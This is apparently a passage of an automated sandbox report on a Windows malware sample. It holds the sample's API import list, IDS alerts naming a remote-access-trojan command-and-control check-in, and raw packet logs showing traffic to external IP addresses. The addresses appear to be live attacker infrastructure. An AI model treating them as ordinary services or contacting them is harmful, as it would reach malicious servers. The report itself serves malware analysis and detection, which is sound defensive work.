GetWindowLongW, GetWindowLongA, GetWindowDC, GetUserObjectInformationA, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetProcessWindowStation, GetParent, GetWindow, GetMessagePos, GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowExA, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExA, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CopyImage, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetPaletteEntries, SetEnhMetaFileBits, SetDIBitsToDevice, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, OffsetRgn, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateFontA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrlenA, lstrcpyA, lstrcmpA, WriteProcessMemory, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, UnmapViewOfFile, TryEnterCriticalSection, TerminateThread, TerminateProcess, SwitchToThread, SuspendThread, SleepEx, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetHandleInformation, SetFileTime, SetFilePointer, SetEvent, SetErrorMode, SetEnvironmentVariableA, SetEndOfFile, SetCurrentDirectoryA, SearchPathA, ResumeThread, ResetEvent, ReleaseMutex, ReadProcessMemory, ReadFile, QueueUserAPC, PulseEvent, PostQueuedCompletionStatus, OpenProcess, OpenMutexA, OpenFileMappingA, OpenEventA, MultiByteToWideChar, MulDiv, MoveFileA, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetWindowsDirectoryA, GetVolumeInformationA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatus, GetProcessTimes, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileType, GetFileSize, GetFileInformationByHandle, GetFileAttributesA, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FlushInstructionCache, FlushFileBuffers, FindResourceA, FindNextFileA, FindNextChangeNotification, FindFirstFileA, FindFirstChangeNotificationA, FindCloseChangeNotification, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitThread, EnumCalendarInfoA, EnterCriticalSection, DuplicateHandle, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessW, CreatePipe, CreateMutexA, CreateIoCompletionPort, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey, InitializeSecurityDescriptor, GetUserNameA
kernel32.dll | Sleep
ole32.dll | CLSIDFromString, CoTaskMemFree, StringFromCLSID
oleaut32.dll | GetErrorInfo, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitializeEx, CoInitialize
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | Shell_NotifyIconA, ShellExecuteA, SHGetFileInfoA
shell32.dll | SHGetSpecialFolderPathA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder, SHBrowseForFolderA
comdlg32.dll | GetSaveFileNameA, GetOpenFileNameA
advapi32.dll | CreateProcessAsUserW
kernel32.dll | SwitchToThread, MapViewOfFile, VirtualQuery, VirtualAlloc, VirtualProtect, GetSystemInfo
ntdll.dll | RtlAnsiStringToUnicodeString, RtlUnicodeStringToAnsiString, RtlFreeAnsiString, NtQueryMutant, NtCreateMutant, NtWaitForSingleObject, NtTerminateProcess, NtQueryVirtualMemory, NtUnmapViewOfSection, NtOpenSection, NtCreateSection, NtQueryObject, NtClose, NtCurrentTeb, NtQuerySystemInformation
rpcrt4.dll | UuidCreate, RpcStringFreeA, UuidFromStringA, UuidToStringA
kernel32.dll | SignalObjectAndWait, InterlockedCompareExchange, FindNextFileA, FindFirstFileA, GetComputerNameExA
wsock32.dll | WSACleanup, WSAStartup, WSAGetLastError, gethostbyname, shutdown, setsockopt, ioctlsocket, inet_addr, htons, getsockname, getpeername, connect, closesocket
ws2_32.dll | WSAEnumNetworkEvents, WSAEventSelect, WSAGetOverlappedResult, WSASend, WSARecv, WSASocketA
Language of compilation system | Country where language is spoken
English | United States
Hebrew | Israel
Russian | Russia
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-04T05:38:50.993382+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49743 | 118.107.44.219 | 19091 | TCP
2025-01-04T05:40:01.363847+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 49744 | 118.107.44.219 | 19091 | TCP
2025-01-04T05:41:05.444765+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 50012 | 118.107.44.219 | 19091 | TCP
2025-01-04T05:42:18.020381+0100 | 2052875 | ET MALWARE Anonymous RAT CnC Checkin | 1 | 192.168.2.4 | 50012 | 118.107.44.219 | 19091 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                          Jan 4, 2025 05:38:16.376368999 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.376507998 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.377218008 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377235889 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377247095 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377258062 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377269983 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.377283096 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.377295971 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.377315998 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378125906 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378138065 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378148079 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378159046 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378170013 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378186941 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378201008 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378839970 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378851891 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378863096 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378875971 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378895998 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378920078 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.378933907 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.378969908 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.379733086 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.426243067 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.593610048 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593617916 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593622923 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593679905 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593696117 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593708992 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593719959 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.593760014 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.593801022 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594127893 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594192028 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594211102 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594223976 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594234943 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594263077 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594264030 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594274998 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594312906 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594789028 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594841957 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594871998 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594883919 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594894886 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594923973 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.594969034 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594980001 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.594990969 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595001936 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595014095 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.595038891 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.595751047 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595763922 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595776081 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595817089 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.595848083 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.595917940 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595930099 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595941067 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595952034 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595964909 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.595967054 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596004963 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596733093 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596745014 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596757889 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596786976 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596793890 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596807003 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596806049 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596822023 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596859932 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.596867085 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596880913 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.596909046 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.597634077 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.597708941 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811229944 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811290979 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811296940 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811307907 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811321974 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811332941 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811347008 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811358929 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811364889 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811376095 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811393976 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811407089 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811501980 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811501980 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811719894 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811734915 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811748981 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811762094 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811774969 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811788082 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.811789989 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811800003 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.811841011 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812117100 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812131882 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812144041 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812170982 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812175989 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812189102 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812202930 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812215090 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812221050 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812247038 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812283993 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:16.812335968 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.812376022 CET497338853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:16.817200899 CET885349733118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.049874067 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.054824114 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.054904938 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.264259100 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:21.264309883 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.264678001 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:21.305592060 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:21.305630922 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828403950 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828425884 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828437090 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828453064 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828463078 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828475952 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828485966 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.828500986 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828514099 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828526020 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828528881 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.828563929 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.828564882 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.828598976 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:21.833446980 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.833458900 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.833471060 CET885349734118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:21.833504915 CET497348853192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:23.522912979 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.522926092 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.522943020 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.522969961 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.523503065 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.523523092 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.523574114 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.523578882 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.523612976 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.523627996 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.524194002 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.524219990 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.524274111 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.524279118 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.524315119 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.524337053 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.526808977 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.526834965 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.526884079 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.526889086 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.526923895 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.526942015 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.537245989 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.537285089 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.537332058 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.537358999 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.537384033 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.537395954 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.549669981 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.549705029 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.549758911 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.549787998 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.549803019 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.549830914 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.613715887 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.613742113 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.613790035 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.613816023 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.613845110 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.613852978 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614042997 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614061117 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614090919 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614099979 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614119053 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614135027 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614433050 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614447117 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614481926 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614490032 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614514112 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614532948 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614752054 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614769936 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614809990 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614814997 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.614850044 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.614861012 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.615128040 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.615145922 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.615184069 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.615190029 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.615216017 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.615231037 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.617842913 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.617863894 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.617912054 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.617934942 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:23.617959976 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.618010044 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:23.726706028 CET4434973547.79.48.211192.168.2.4
